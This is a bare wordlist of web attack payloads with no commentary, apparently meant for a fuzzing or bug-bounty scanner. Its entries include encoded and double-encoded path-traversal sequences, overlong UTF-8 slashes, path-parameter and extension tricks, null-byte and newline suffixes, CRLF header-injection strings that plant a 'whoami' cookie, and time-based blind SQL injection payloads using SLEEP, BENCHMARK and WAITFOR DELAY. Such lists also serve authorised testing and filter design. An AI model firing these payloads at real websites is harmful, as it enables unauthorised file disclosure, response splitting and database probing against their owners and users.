%2e%2e%252f
%2e%2e/
..%2f
%2e%2e%5c
%2e%2e\
..%5c
%252e%252e%255c
..%255c
..%c0%af
..%c1%9c
%252%66
%252%65
%252f
%252e
\u002E\u002E\u002F
\u003F
\u0023
\u005C
%3F
%26
%23
..%ff/
..%0d/
..%5c
%2e%2e%5C
%2e%2e%2f
..\.\..\.\..\booyakasha
;var1=val
;var=a/world;var1=b;var2=c
.html
.css
.js
.aaaa
%00aaa
%0aaaa
..%2fworld
%0D%0A%20Set-Cookie:whoami=thecyberneh
%20%0D%0ASet-Cookie:whoami=thecyberneh
%0A%20Set-Cookie:whoami=thecyberneh
%2F%2E%2E%0D%0ASet-Cookie:whoami=thecyberneh
%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh
x'XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR'
'x AND BENCHMARK(40000000,SHA1(1337))-- -
x'; IF (true) WAITFOR DELAY '0:0:05'--
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'

